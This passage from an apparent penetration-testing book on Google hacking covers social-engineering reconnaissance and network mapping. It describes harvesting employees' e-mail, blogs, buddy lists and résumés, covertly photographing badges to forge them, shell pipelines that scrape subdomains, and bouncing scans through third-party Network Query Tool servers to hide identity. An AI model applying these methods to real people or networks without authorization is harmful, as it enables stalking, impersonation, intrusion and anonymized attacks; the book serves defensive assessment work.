It's one thing to search for e-mail addresses based on a company's common domain name. It's quite another to determine e-mail addresses that are subtly connected to a target. Google can be used to determine these often critical relationships that frequently reveal personal addresses and relationships between addresses and individuals.

First, start with a "dirty" list of e-mail addresses grabbed with the basic e-mail location techniques discussed here. This dirty list can consist of every e-mail address found on the same page as an "obvious" e-mail address belonging to your target. For scraped newsgroup messages, this will often include quite a few "fringe" addresses. Using the dirty list, automate queries for each and every combination of e-mails in the list. For each combination of e-mails that results in more than one hit, there is some relationship between the addresses. The higher the number of hits for the combination, the stronger the relationship.

To determine less obvious relationships, split address hits into collections. For example, scrape e-mail addresses from every Web page that lists EmailA. We'll call this list CollectionA. Next, scrape e-mail addresses from every Web page that lists EmailB. We'll call this CollectionB. Automate Google queries that combine EmailA with each and every e-mail address in CollectionB. If there's a hit (any query that results in at least one hit), there's a loose relationship between EmailA and EmailB.
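The collection logic above can be sketched in a few lines of Python. This is only an illustration under stated assumptions, not the SensePost prototype: it sends no queries at all, and instead counts how often two addresses appear together in pages that have already been scraped, using that count as a stand-in for Google hit counts. The pages dictionary, its URLs and addresses, and the function names hits, collection, and loosely_related are all hypothetical.

```python
# Hypothetical scrape results: page URL -> e-mail addresses found on that page.
pages = {
    "http://example.org/post1": {"a@target.com", "b@target.com", "x@home.net"},
    "http://example.org/post2": {"a@target.com", "x@home.net"},
    "http://example.org/post3": {"b@target.com", "y@school.edu"},
    "http://example.org/post4": {"y@school.edu", "x@home.net"},
    "http://example.org/post5": {"z@other.org", "w@other.org"},
}


def hits(pages, first, second):
    """Number of pages that list both addresses (stand-in for a hit count)."""
    return sum(1 for found in pages.values() if first in found and second in found)


def collection(pages, email):
    """Every other address seen on any page that lists `email`."""
    seen = set()
    for found in pages.values():
        if email in found:
            seen |= found
    seen.discard(email)
    return seen


def loosely_related(pages, email_a, email_b):
    """True if email_a shares a page with any address in email_b's collection."""
    for other in collection(pages, email_b):
        if other != email_a and hits(pages, email_a, other) > 0:
            return True
    return False


print(hits(pages, "a@target.com", "x@home.net"))
print(loosely_related(pages, "a@target.com", "y@school.edu"))
print(loosely_related(pages, "a@target.com", "z@other.org"))
```

In this made-up data set, a@target.com and y@school.edu never share a page, yet they are linked through addresses that appear alongside both, which is exactly the kind of indirect connection the technique is meant to surface. Swapping the two arguments runs the same test in the other direction.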
Next, reverse the search, combining EmailB with each and every address in CollectionA. Again, a hit indicates a loose relationship between EmailB and EmailA. The researchers at SensePost (www.sensepost.com) have coded a prototype of this technique, and the resultant list of associations can be very revealing. When tested, nonobvious relationships are often revealed in relatively short order.

Personal Web Pages and Blogs

In addition to the business side of the Internet, there is a more human side, one that is frequently driven by a person's vanity and sense of self-importance. One of the factors fueling the massive growth and popularity of the Internet is personal Web sites and blogs, or Web logs: personal journals of the Internet-connected masses. Blogging has recently experienced a huge boom in users all rushing to put up their personal thoughts and opinions on various matters. Often, locating an individual's personal Web page or blog can provide insight into that person, which might help you gain access to him or her as an employee via a bit of creative social engineering. Searching for a person's name and e-mail address combined with terms such as homepage, blog, or family can quickly and easily locate these types of pages for you. From personal likes and dislikes to home phone numbers and pets' names, people slap this potentially devastating information up on the Internet without giving it a second thought.

Instant Messaging

In addition to using e-mail, thousands of people use one of the instant-messaging programs to stay in touch with their friends and associates. These programs use buddy lists, usually a list of an individual's "inner circle," so getting hold of a person's buddy list can be very useful at later stages of the game. So how do you find a person's buddy list? Once again, Google comes to the rescue with a simple search such as inurl:buddylist.blt, as shown in Figure 4.10.

Figure 4.10 Buddy Lists Online
[Screenshot: Google Web results for inurl:buddylist.blt, 7 hits, each showing the screen names stored in a buddy list file.]

Simple searches for résumés will return far too many false positives. However, let's take a look at a more creative search that narrows down the results: "phone * * *" "address *" "e-mail" intitle:"curriculum vitae". As you can see in Figure 4.11, creative searches yield successful results.

Figure 4.11 Finding Resumes
[Screenshot: Google Web results for "phone * * *" "address *" "e-mail" intitle:"curriculum vitae", about 13,100 hits.]
Keeping in mind that an attacker can never have too much information when embarking on a social engineering quest, these are but a few of the ways to gather data about company employees. eBay, Amazon, and other online stores or message boards are all good places to grab information about a person's interests. Amazon "wish lists" are great ways to learn about a target's interests, although we certainly don't condone "buying off" employees during an assessment. That's just bad form. If you even thought about doing that, refer to Appendix A to help get your feet back on a solid pen-test professional's ground.

Romantic Candlelit Dinners

Gathering information about a company's employees is a vital part of preparing for a successful social engineering job. However, unless you intend to carry out your entire scam over the phone, you're going to need more than just information on paper. Phone scams work great, but to really test your company's security, you need to actually get through the front door. Breaking into a facility is part of what's been referred to as a physical assessment. A physical assessment requires a distinct set of skills and is often not performed adequately by most technical types, but in more and more cases, pen testers are being called on to give the "doorknob a turn" in the world of physical security.
If you are called on to perform a basic physical assessment, Google can help in quite a few ways. Most of these assessments involve getting up close and personal with employees of the target company.

Badges? We Don't Need No Steenkin' Badges!

Google's image search can be used to troll for corporate logos that can be used to create everything from corporate letterhead to access badges. Creating a bogus (but realistic-looking) access badge often requires a glimpse of a real badge, which is certainly never found online. Getting a glimpse of a real badge is as simple as locating a few good employee hangouts and hanging out there yourself, but when it comes time to create an access badge, Google's image search is a terrific way to find a nice, clean logo to use for your artistic endeavors. A word of caution: Once you sweet-talk your way into a facility, never, ever make the mistake of getting caught by security on your way out of the facility, even if you get a really strong hankerin' to visit the hot dog guy out front. Your coworkers will never let you live it down, and your story will inevitably end up in a really public place (a Google hacking book, for example).

What's Nearby?

Nonconfrontational contact with your target employees is an essential part of your preparation. By nonconfrontational, we mean people watching, eavesdropping on conversations, and possibly even striking up friendly but underhanded conversations. Once again, Google comes to the rescue with Google Local (http://local.google.com/). Google Local allows you to search by business type and location, allowing you to locate any type of business near your target, as shown in Figure 4.12.

Figure 4.12 Google Local
[Screenshot: the Google Local search page, with a "What" field (e.g. coffee shops) and a "Where" field (e.g. Poughkeepsie, NY).]
Poughkeepsie, NY Remember this location Find local businesses and services on the web. Google Home - Local Search Help By simply entering a ZIP code and some key phrases, you can use Google Local to locate places to hang out to soak up corporate gossip. Let's take a look at a few examples. Coffee Shops Coffee shops are a great place to start the day, no matter where you work (unless you work for a coffee shop, of course) . Employees frequently gather at their local coffee shop to get their morning dose of caffeine before beginning their long, drudging day at the office. Hitting Google Local and searching for coffee shop within the target area will tell you the closest (and most likely) places for these not-yet-awake workers to be gathering. Grab your laptop and a large coffee and take a spot at the table closest to the line (usually the last table people want). If you haven't spent much time in these kinds of places, you probably don't realize how much gossip people engage in while in line. This could be company-related gossip or gossip about other employees — but whichever type it is, it is informa- tion that often can't be gathered anywhere else and is as good as gold. Diners and Delis So you've finished your morning eavesdropping and gotten loads of good infor- mation. That still isn't going to get you in the door. For that you need to look official. Again, Google Local can help out. Search for diners or delicatessens near www. syngress.com Pre-Assessment • Chapter 4 145 your target. What is so great about these places? Often the busy employee wiU rush out for a quick meal to take back to the office. These employees rarely remove their access badges for such a quick jaunt, and a digital camera with a zoom lens can help when it's time to create your own badge. Grab a comfortable seat with a good view of people's fronts as they herd through the chow line. 
Digital cameras may be obvious for this type of work, but laptops with built-in cams (such as the Sony VAIO) can be positioned to look perfectly natural as they record those juicy shots of employee badges.

Gas Stations

Gas stations are perfect spots to troll for badge sightings. The quick in-and-out nature makes for a constant wave of employees, especially during rush hours and lunch breaks. In most cases you won't be able to set up shop inside the station without drawing undue attention, but you can almost certainly hole up in your car for a while or hang out across the street. This is the perfect excuse to buy that super-spy lens you always wanted for your camera.

Bars and Nightclubs

So you were browsing John Q. Employee's blog and you noticed he's a big pool player. Using Google Local to help you pinpoint his probable favorite hangouts near work or home is quick and easy. Knowing what you know about John, you can use that information to "buddy up" to him while extracting gossip about his company and its employees. Alcohol makes for loose lips and a lowered defense, and getting John to trust you will give you yet another "in" if he sees you wandering the halls at his workplace.

Underground Googling...
Use Your Imagination!

Google Local provides you with an almost infinite supply of places to bump into your target employees. The examples provided here were just a few ideas to get your creative juices flowing, but don't stop at these. Gas stations, hair salons, and grocery stores are other places where you can catch a glimpse of a badge or chat up your target.

Pre-assessment Checklist

■ Make sure your intranet is just that: an intranet. Communications meant for internal use only should never be available on the Internet.
■ Keep up with what is being said, both good and bad, about your company on the Internet. To be forewarned is to be forearmed.
■ Keep on top of what is being posted to Usenet. You can't control what your employees do on their off time, but you have every right to keep them from posting while they're at work or disclosing potentially devastating information about your company or network.
■ Educate your users on proper use of e-mail and instant-messaging programs. Frequently browse the Internet to make sure that they haven't accidentally (or on purpose, perhaps for easier retrieval) placed something on the Internet that they shouldn't have.
■ Have proper procedures in place to safeguard employee ID badges or cards. Again, education is key to prevent leakage of company secrets or other information that could be useful to an attacker.
■ You can't expect to fully prevent a savvy attacker using human nature against your company, but you can minimize the potential damage through user training and education.

Summary

The phrase "You never get a second chance to make a first impression" is critical to remember when preparing for a date; it also rings true during a physical assessment or social engineering exercise. Proper preparation can make or break the success of your test and, unlike the actual testing itself, could take weeks to do properly. Learning the ins and outs of the company, learning about the people, and getting to know the environment are all crucial to your success. The bad guys know this and will take advantage of it. You owe it to your customers to use similar tactics in testing their defenses.

Solutions Fast Track

The Birds and the Bees

☑ Intranet and Human Resource pages are a great way to learn details about your target. Browse the company intranet for the company's policies and procedures.
☑ Help desk procedures and "how-to" documents contain details about an environment that might be difficult to determine using more traditional techniques.
☑ Job listings reveal specific information about company structure and technologies that might be in use.
☑ Scrape the Internet for company logos and images using Google Images.
☑ Follow the links behind vanity photos provided on Google Images for more information about your target.

Long Walks on the Beach

☑ Getting more personal with the individuals who make up the target organization can bring big payoffs.
☑ Use Google Groups to harvest employee names.
☑ Vanity is key: use Google to locate personal Web sites and blogs.
☑ Use the included Perl script to harvest e-mail addresses from the target domain.
☑ E-mails, resumes, and instant-messaging programs can all provide intimate details about your target.

Romantic Candlelit Dinners

☑ Utilize Google Local to find businesses in the area for people watching and eavesdropping.
☑ Stake out the area around your target and be where employees congregate. Consider restaurants, delicatessens, and gas stations for badge-sighting opportunities.
☑ Go where the employees go: bars, pool halls, nightclubs. All present opportunities to gain trust and gossip.

Links to Sites

■ http://groups.google.com/
■ http://images.google.com/
■ http://www.sensepost.com/

Frequently Asked Questions

The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com.

Q: I know my company intranet isn't in Google. Is there any reason to check again?
A: Just because Google hasn't found sensitive information yet, there is no guarantee that your company's web development team won't slip up and expose your network. Just as you keep on top of security patches and exploits, so should you remain aware of potential liability via Google.

Q: How often should I check for sensitive company information in Google?

A: Obviously, checking daily would take precious time away from your other duties. However, checking once every six months may be too late. There is no one interval that can apply to every network, but a good rule of thumb is that the larger your network, the more often you should run your site through Google. Later in this book you will find some tools to automate the process for you.

Q: How can I keep my users from putting sensitive information about themselves on the Internet?

A: Simply put: you can't. You can educate your users and warn them about the dangers of exposing personal information about themselves on the Internet, but you can't prevent them from doing it. Your best course of action, then, is to hold regular "education" sessions with your users. Besides, if you have enough time to regularly spend tracking down the online activities of all your users, you probably should find another job that gives you something to do.

Q: Should a company have a paragraph in the security policy about Google?

A: Every company should think of the risk of information leakage, including leaking to Google. The effect of search engines can be just as bad as dumpster diving, compromised teleworking equipment (laptops, PCs at home), and so on. This existing guide could easily be expanded to include rules about the usage of public Usenet groups for questions and about putting sensitive Office documents on the Web server.

Chapter 5

Network Mapping

Solutions in this Chapter:

■ Mapping Methodology
■ Mapping Techniques
■ Targeting Web-Enabled Network Devices
■ Locating Various Network Reports

☑ Summary
☑ Solutions Fast Track
☑ Frequently Asked Questions

Introduction

The initial phase of an external blind security assessment involves finding targets to assess. Beyond simply locating targets, any good auditor (or attacker) knows that the easiest targets are those lost, forgotten machines that lie "off the radar" of the IT security team.

In this chapter, we'll discuss ways Google can help with the network discovery phase of an external blind assessment. This is an important skill for any auditor, since more and more networks are being compromised not through exploitation of vulnerabilities found on heavily guarded, carefully monitored "front door" systems, but through exploitation of lost, forgotten systems that fall off the radar of already overworked administrators. We'll begin the chapter by discussing a very basic methodology for network discovery. Next, we'll look at some specific ways Google can be used to help in the discovery process. We'll discuss site crawling, domain name determination, link mapping, and group tracing, techniques that have proven to be excellent ways to enumerate the hosts that exist on a network. As we wrap up this chapter, we discuss various ways that Web-enabled network devices can be discovered and exploited via Google to reveal surprisingly detailed information about a target network.

As you read this chapter, bear in mind that the topic of network discovery is quite broad. In fact, an entire book could be dedicated to the mastery of this technique. However, Google plays a valuable role in this process, and it's our hope that this chapter will provide you with just a few more tricks for your network discovery toolkit.
Mapping Methodology

In the context of the Internet, computers are categorized within domains. The most famous top-level domain, .COM, has practically become a household word. Working back from a top-level domain, company and server names are tacked on from right to left until a fully qualified domain name (FQDN) is formed. The FQDN (like www.sensepost.com) serves as a human-friendly address to a virtual location on a network, like the Internet. Although they serve us humans well as handy memory hooks, the machines that make up the Internet care little for these frilly FQDNs, preferring to reference machines on a network by a numeric Internet Protocol (IP) address. Granted, this is a simplistic view of the way things work on the Internet, but the point is that we, like Google, often prefer to speak in terms of FQDNs and domain names, reserving the numeric part of our limited memories for more important things like phone numbers and personal gross yearly earnings. However, when attempting to discover targets on a network, domain names and IP addresses need to be equally considered.

Since Google works so well with domain names (remember the site operator), a network discovery session can certainly begin with a domain name. We'll use sensepost.com as an example domain since SensePost has pioneered many unique network discovery techniques, some of which we'll discuss in this chapter. SensePost, like most companies, has several registered domain names. In the first phase of a solid mapping methodology, we must first discover as many domain names associated with SensePost as possible. In addition to discovering domains owned by the target, it's often important to review sites linked to and sites linked from the target. This reveals potentially important relationships between domains and could provide important clues about any type of trust relationships between the two domains.
Armed with a list of domains owned by the target, a list of subdomains could be gathered. A subdomain extends a domain name by one level. For example, sales.sensepost.com could be a valid subdomain of sensepost.com. In most cases, each subdomain points to a distinct machine on the network. A domain of ftp.sensepost.com could point to a dedicated FTP server, while www.sensepost.com could point to a dedicated Web server. Because of this, it's important to determine IP addresses used by the target network. Since address space on the Internet is regulated, each IP address must be properly registered. Since IP address registration information is public, it's fairly common for security auditors to query the various Internet registrars for information about a particular IP address. This registration information includes contact name, address, telephone number, and information about the IP address block owned by the target. This block of addresses allows you to safely expand the scope of your assessment without worrying about stumbling onto someone else's network during your audit.

Once IP addresses are determined, the audit will generally begin to blur into the next phase, the host assessment phase. Each IP address must be tested or "pinged" by any variety of methods to determine if the machine is alive and accessible. Machines are then scanned to determine open ports, and applications running on these ports are tested for vulnerabilities.

Although many different tools and techniques could be employed for each phase of this (admittedly basic) methodology, Google's search capability can play an important role in each of these phases, as we'll see in the following sections.

Mapping Techniques

In this section, we'll see creative ways Google can be used to assist in the network discovery and mapping process. The techniques here are presented in roughly the same order they appear in the mapping methodology.
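As a rough illustration of the domain-to-subdomain step of the methodology, the Python sketch below groups discovered host names under the target domains that own them. It is only a sketch under stated assumptions: the function names split_fqdn and group_by_domain are invented for this example, www.example.org is a hypothetical unrelated host, and ownership is decided by simple suffix matching rather than by consulting any registry.

```python
from collections import defaultdict


def split_fqdn(fqdn, known_domains):
    """Split an FQDN into (host_part, domain), preferring the longest known domain.

    Returns None when the name does not fall under any known domain.
    """
    name = fqdn.rstrip(".").lower()
    for domain in sorted(known_domains, key=len, reverse=True):
        domain = domain.lower()
        if name == domain:
            return "", domain  # the bare domain itself, no host part
        if name.endswith("." + domain):
            return name[: -len(domain) - 1], domain
    return None


def group_by_domain(fqdns, known_domains):
    """Map each known domain to the sorted host names discovered beneath it."""
    grouped = defaultdict(set)
    for fqdn in fqdns:
        parts = split_fqdn(fqdn, known_domains)
        if parts is not None:
            grouped[parts[1]].add(fqdn.rstrip(".").lower())
    return {domain: sorted(hosts) for domain, hosts in grouped.items()}


# Hypothetical discovery results; only names under sensepost.com are kept.
hosts = ["www.sensepost.com", "ftp.sensepost.com", "sales.sensepost.com", "www.example.org"]
print(group_by_domain(hosts, ["sensepost.com"]))
```

Each name that survives the grouping would then be a candidate for the IP address determination step described above; names that match no known domain are dropped rather than guessed at.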
Domain Determination

Since it's important to gather as many domain names as possible, we need to discuss some techniques for determining domain names the target may own. One of the most common sources for domain information is the various Internet registries. Techniques for exploring Internet registries are well known and well documented. However, a few very simple methods can be used to determine the possible domain names registered by an organization. At the 2003 BlackHat briefings in Las Vegas, SensePost presented an excellent paper entitled "Putting the Tea Back into Cyber Terrorism" in which Roelof Temmingh discussed this very topic. Roelof's suggestions were simple, yet effective.

First, and most obviously, determine where the organization is based. This will affect the top-level domain (TLD). Sites in the United States often use the common .COM, .NET, and .ORG domains. Outside the United States, sites will often use a domain name like .co.XX or .com.au, where XX represents a country code. In some cases, it's possible that the target organization has Web sites registered in many different countries. In this case, multiple TLDs should be searched. Once a TLD is determined, the first obvious domain includes the common name of the company, stripped of spaces, followed by the TLD; for example, Telstra's Australian site, Telstra.com.au. Other domain names can be determined using these techniques:

■ If the organization's name has a common abbreviation, use that. For example, National Australian Bank, nab.com.au.
■ If the organization is known by a common abbreviation that would create an ambiguous or invalid domain name, a country abbreviation could be included in the domain name. For example, consider Deutsche Telekom at dtag.de or Japan Airlines at jal.co.jp.
■ If the organization name contains spaces, remove them, appending the TLD. For example, Banco do Brasil at bancodobrasil.com.br.
■ If the organization name contains many words, attempt all the words in the name. For example, consider lucent.com.
■ If a domain search returns domain names that don't seem to fit, consider using a correlation function to determine how many sliding three-character instances match between the company name and the domain name. For example, Coca Cola Enterprises found at cokecce.com, or Kansai Electric Power found at kepco.co.jp.

These techniques work very well at determining domain names, even when the domain names are not "public." For example, a Google search for site:nab.com.au returns no hits, even though the site resolves and forwards to the National Australian Bank Web site. However, for the vast majority of domain names, simply entering a company name into a properly formatted Google query will list many viable domain names, as we'll see in the next section.

Site Crawling

Simply popping a company name into Google often returns the most popular domain name for that company. However, gathering a nice list of subdomains can take a bit more work. Consider a search for site:microsoft.com shown in Figure 5.1.

Figure 5.1 Site Searches Return Common Domain Names

Looking at the first five results from this query, there's not much variety in the returned DNS names. Only two unique domain names were returned, www.microsoft.com and msdn.microsoft.com, the latter of which is most likely a subdomain since it does not begin with a common-looking hostname like "www." One way to narrow our search to return more domain names is by adding a negative search for www.microsoft.com. For example, consider the results of the query site:microsoft.com -www.microsoft.com, or site:microsoft.com -site:www.microsoft.com, as shown in Figure 5.2.

Figure 5.2 Reducing Common Subdomains

This search returns more variety, returning four new domain names in the first four results. These names (msdn, msevents, members, and support) could also be added as negative queries to locate even more results. A technique like this is very cumbersome, unless it is automated. We'll cover more automation techniques later, but let's consider two simple examples. First, we'll look at a page scraping technique.

Page Scraping Domain Names

Using the popular command-line browser lynx supplied with most UNIX-based operating systems, we could grab the first 100 results of this query with a command like:

    lynx -dump "http://www.google.com/search?\
    q=site:microsoft.com+-www.microsoft.com&num=100" > test.html

This would save the results of the query to a file, which we could process to extract domain names. Note that Google does not condone automated queries as mentioned in their Terms of Service located at www.google.com/terms_of_service.html.
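The narrowing loop described above (query, pull out host names, add them as negative terms, repeat) can be sketched offline in Python. This is a minimal sketch under stated assumptions, not the method used in this chapter: build_search_url and extract_hosts are names invented for this example, the code only builds a URL string and parses text that has already been saved, and it sends no queries itself.

```python
import re
from urllib.parse import urlencode


def build_search_url(domain, exclude=(), num=100, start=0):
    """Build a search URL for site:<domain>, minus each host already seen."""
    terms = [f"site:{domain}"] + [f"-site:{host}" for host in exclude]
    params = {"q": " ".join(terms), "num": num}
    if start:
        params["start"] = start  # offset of the first result to return
    return "http://www.google.com/search?" + urlencode(params)


def extract_hosts(text, domain):
    """Return sorted, de-duplicated host names under <domain> found in URLs in text."""
    pattern = re.compile(
        r"https?://((?:[a-z0-9-]+\.)+" + re.escape(domain) + r")(?=[/\s:]|$)",
        re.IGNORECASE,
    )
    return sorted({match.group(1).lower() for match in pattern.finditer(text)})


# Hypothetical saved output, shaped like the numbered references lynx -dump prints.
saved = """
   1. http://msdn.microsoft.com/howtobuy/vbasic/default.aspx
   2. http://support.microsoft.com/?kbid=837209
   3. http://msdn.microsoft.com/
"""
seen = extract_hosts(saved, "microsoft.com")
print(seen)
print(build_search_url("microsoft.com", exclude=seen))
```

Feeding the hosts found on one page back in as exclusions is what makes the next page of results more varied, which is the same effect as adding the negative terms by hand.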
However, Google has not historically complained about the use of the lynx browser to perform this type of query. Once the results are saved to the test.html file, a few shell commands can be used to extract domain names as shown in Figure 5.3.

    $ lynx -dump "http://www.google.com/search?\
    > q=site:microsoft.com+-www.microsoft.com&num=100" > test.html
    $ sed -n 's/\. http:\/\/[[:alpha:]]*.microsoft.com\//& /p' test.html | awk '{print $2}' | sort -u
    http://communities.microsoft.com/
    http://download.microsoft.com/
    http://go.microsoft.com/
    http://members.microsoft.com/
    http://msdn.microsoft.com/
    http://msevents.microsoft.com/
    http://murl.microsoft.com/
    http://office.microsoft.com/
    http://research.microsoft.com/
    http://search.microsoft.com/
    http://support.microsoft.com/
    http://uddi.microsoft.com/

Figure 5.3 Simple Shell Commands Scrape Domain Names

This process yields 13 unique subdomains (including the www.microsoft.com domain) from a single page of 100 Google hits. Extending the search involves simply appending &start=100 to the end of the lynx URL, appending the HTML into the test.html file, and then running the shell script again. This will return results 100-200 from Google. In fact, this process could be repeated over and over again until 1000 Google results are retrieved. However, keep in mind that the 80/20 rule applies here: In most cases, you'll get 80 percent of the best results from the first 20 percent of work. For example, extending this search to retrieve 1000 Google results returns the following subdomains:

    http://c.microsoft.com/
    http://communities.microsoft.com/
    http://download.microsoft.com/
    http://go.microsoft.com/
    http://ieak.microsoft.com/
    http://members.microsoft.com/
    http://msdn.microsoft.com/
    http://msevents.microsoft.com/
    http://murl.microsoft.com/
    http://office.microsoft.com/
    http://rad.microsoft.com/
    http://research.microsoft.com/
    http://search.microsoft.com/
    http://support.microsoft.com/
    http://terraserver.microsoft.com/
    http://uddi.microsoft.com/
    http://windows.microsoft.com/
    http://www.microsoft.com/

This list includes only 18 subdomains. This means that over 70 percent of the results (13 of 18) came from the first 100 Google results, while less than 30 percent of the results came from the next 900 results! In cases like this, it may be smarter to start reducing the more common domain names (msdn, support, download) from the Google query before trying to grab more data from Google. It's always best to search smart and parse less.

API Approach

Another alternative for gathering domain names involves the use of a Perl script. The Google API allows for 1000 queries per day and is the only approved way to automate Google queries. One excellent script, dns-mine.pl, was written by Roelof Temmingh of SensePost (www.sensepost.com). This script is covered in detail in Chapter 12, but let's look at dns-mine in action. Figure 5.4 shows a portion of the output from dns-mine run against microsoft.com.

Figure 5.4 dns-mine Automates Domain Name Discovery

The DNS names listed in the output include:

    dgl.microsoft.com
    www.beta.microsoft.com
    g.microsoft.com
    msevents.microsoft.com
    www.microsoft.com
    windowsbeta.microsoft.com
    office.microsoft.com
    netscan.research.microsoft.com
    go.microsoft.com
    webevents.microsoft.com
    msdn.microsoft.com
    partnering.one.microsoft.com
    beta.microsoft.com
    officebeta.microsoft.com
    activex.microsoft.com
    oca.microsoft.com
    eopen.microsoft.com
    lab.msdn.microsoft.com
    download.microsoft.com
    terraserver.microsoft.com
    murl.microsoft.com
    ntbeta.microsoft.com
    v4.windowsupdate.microsoft.com
    home.microsoft.com
    support.microsoft.com
    research.microsoft.com

dns-mine searches for the name of the company combined with different types of common words like site, web, document, internet, link, or about. The script then intelligently parses the query results to find DNS names and subdomains. As you can see from the output in Figure 5.4, dns-mine located nearly twice as many DNS names as our previous technique, with nearly the same number of queries.

Link Mapping

Beyond gathering domain and subdomain names, many times it's important to understand nonobvious relationships between Web sites. In some cases, locating a vulnerability in a poorly secured trusted partner site is a simple way to slip inside a heavily guarded "big iron" target. One of the easiest ways to determine obvious relationships between Web sites is to take some time to explore a target Web site. If your target links to a page, there may be some kind of trust relationship that could be exploited. If some other site links to your target site, this may also indicate some kind of relationship, but this kind of "inbound link" is less meaningful since any Internet user can throw up a link to any Web site she pleases. In technical terms, a link from your target site has more weight than a link to your target site. However, if two sites link to each other, this indicates a very strong relationship. This type of relationship exists at the first degree of relevance, but there exist other degrees of relevance.
For example, if our target site (siteA) links to another site (siteB), and that site links to a third site (siteC) that hosts a link back to our target (siteA), there is a relationship (albeit a loose relationship) between our target and siteC via siteB. This overly simplifies the very important concept of "link weighting." The researchers at SensePost (www.sensepost.com) have put a lot of time and effort into uncovering online nonobvious relationships and exploiting the relevance of these relationships in the context of security work. Their BlackHat 2003 paper entitled "The role of non-obvious relationships in the footprinting process" details some very powerful "footprinting" techniques that apply to this topic of network mapping. We won't be able to do SensePost's awesome work justice in a few short pages, but suffice it to say that Google plays a very important role in the mapping process. The link operator, for example, can be used to determine what sites link to a target (like www.sensepost.com) at the first level of relevance with a query like link:www.sensepost.com as shown in Figure 5.5.

Figure 5.5 link as a First-Pass Link Checker

[Figure: a Google Groups posting located with the query author:@microsoft.com, displayed with its full headers. Legible header lines include:
    From: aoltean@microsoft.com (Adi Oltean [MSFT])
    Newsgroups: comp.compression
    Subject: Re: Decompressing .MSI
    Date: 9 Nov 2004 15:22:58 -0800
    NNTP-Posting-Host: 131.107.71.96]

The header of this newsgroup posting reveals a great deal of information, but from the standpoint of creating a network map, the NNTP-Posting-Host, listed as 131.107.71.96, is relevant. This host, which resolves to tide133.microsoft.com, can be added to a network map as an NNTP server, without ever sending a single packet to that network, all because of a single Google query. In addition, this information can be reversed in an attempt to find more usernames with a Groups query of 131.107.71.96 as shown in Figure 5.9.

Figure 5.9 A Reversed Author Search

These results reveal that David Downing, Tatyana Yakushev, and Nick are all most likely Microsoft employees since they use MSFT in their descriptions and have posted messages using an apparently nonpublic Microsoft NNTP server. Under normal circumstances, this "Nick" character could be just about anyone, but his use of a Microsoft-only NNTP server confirms his identity, and ties him to both David and Tatyana. There is also the possibility that these three employees work in the same office as they have similar job duties (evidenced by their posting to the same specifically technical newsgroup) and share an NNTP server. This type of information could be handy for a social engineering effort.

Non-Google Web Utilities

Google is amazing and very flexible, but it certainly can't do everything. Some things are much easier when you don't use Google. Tasks like WHOIS lookups, "pings," traceroutes, and port scans are much easier when performed outside of Google.
There is a wealth of tools available that can perform these functions, but with a bit of creative Googling, it's possible to perform all of these arduous functions and more while preserving the level of anonymity Google hackers have come to expect. Consider a tool called NQT, the Network Query Tool, shown in Figure 5.10.

Figure 5.10 The Network Query Tool Offers Interesting Options
[Screenshot: the Network Query Tool form. Host Information options: Resolve/Reverse Lookup, Get DNS Records, Whois (Web), Whois (IP owner). Host Connectivity options: Check port (80), Ping host, Traceroute to host, Do it all. A host field and a "Do it" button complete the form.]

Default installations of NQT allow any Web user to perform IP host name and address lookups, DNS queries, WHOIS queries, port testing, and traceroutes. This is a Web-based application, meaning that any user who can view the page can generally perform these functions against just about any target. This is a very handy tool for any security person, and for good reason. NQT functions appear to originate from the site hosting the NQT application. The Web server masks the real address of the user. The use of an anonymous proxy server would further mask the user's identity.

We can use Google to locate servers hosting the NQT program with a very simple query. The NQT program is usually called nqt.php, and in its default configuration displays the title "Network Query Tool." A simple query like inurl:nqt.php intitle:"Network Query Tool" returns many results, as shown in Figure 5.11.

Figure 5.11 Using Google to Locate NQT Installations
[Screenshot: Google Web search for inurl:nqt.php intitle:"Network Query Tool", showing results 1 - 10 of about 51. Each hit is a page titled Network Query Tool at a URL ending in nqt.php.]

After submitting this query, it's a simple task to click through the results pages to locate a working NQT program. However, the NQT program accepts remote POSTs, which means it's possible to send an NQT "command" from your Web server to the foo.com server, which would execute the NQT "command" on your behalf. If this seems pointless, consider the fact that this would allow for simple extension of NQT's layout and capabilities. We could, for example, easily craft an NQT "rotator" that would execute NQT commands against a target, first bouncing them off an Internet NQT server. Let's take a look at how that might work.

First, we'll scrape the results page shown in Figure 5.11, creating a list of sites that host NQT. Consider the following Linux/Mac OS X command:

lynx -dump "http://www.google.com/search?q=inurl:nqt.php+%22Network+Query+Tool%22&num=100" | grep "nqt.php$" | grep -v google | awk '{print $2}' | sort -u

This command grabs 100 results of the Google query inurl:nqt.php "Network Query Tool", keeps the lines that end in nqt.php, removes any line that contains the word google, prints the second field of each remaining line (which is the URL of the NQT site), and sorts the list, removing duplicates.
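The filtering stages of that pipeline can also be sketched in Python, which makes each step easy to inspect on a saved dump. This is a minimal sketch, not the author's method: the function name extract_nqt_urls and the sample text are hypothetical, the sample reuses placeholder hosts, and the match on nqt.php is a literal suffix test rather than grep's regular expression.

```python
def extract_nqt_urls(dump_text):
    """Approximate: grep "nqt.php$" | grep -v google | awk '{print $2}' | sort -u"""
    urls = set()
    for line in dump_text.splitlines():
        if not line.endswith("nqt.php"):   # keep lines ending in nqt.php
            continue
        if "google" in line:               # drop lines mentioning google
            continue
        fields = line.split()              # split on runs of whitespace, like awk
        if len(fields) >= 2:
            urls.add(fields[1])            # second field is the URL
    return sorted(urls)                    # sorted, duplicates removed


# Hypothetical excerpt of a text dump's link list; the hosts are placeholders.
sample_dump = """\
References

   1. http://www.google.com/preferences
   2. http://noc.neksample.org/nqt.php
   3. http://cahasample.com/nqt.php
   4. http://noc.neksample.org/nqt.php
   5. http://samplehost.net/nqt.php?proceed=1
"""

nqt_urls = extract_nqt_urls(sample_dump)
for url in nqt_urls:
    print(url)
```

Working on a saved copy of the dump keeps the parsing step separate from the fetching step, so the filter can be adjusted without issuing the query again.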
This command will not catch NQT URLs that contain parameters (since nqt.php will not be the last word in the link), but it produces clean output that might look something like this:

http://bevmo.dynsample.org/uptime/nqt.php
http://biohazard.sifsample?.com/nqt.php
http://cahasample.com/nqt.php
http://samplehost.net/resources/nqt.php
http://linux.sample.nu/phpwebsite_v1/nqt.php
http://noc.bogor.indo.samplenet.id/nqt.php
http://noc.cbn.samplenet.id/nqt.php
http://noc.neksample.org/nqt.php
http://portal.trgsample.de/network/nqt.php

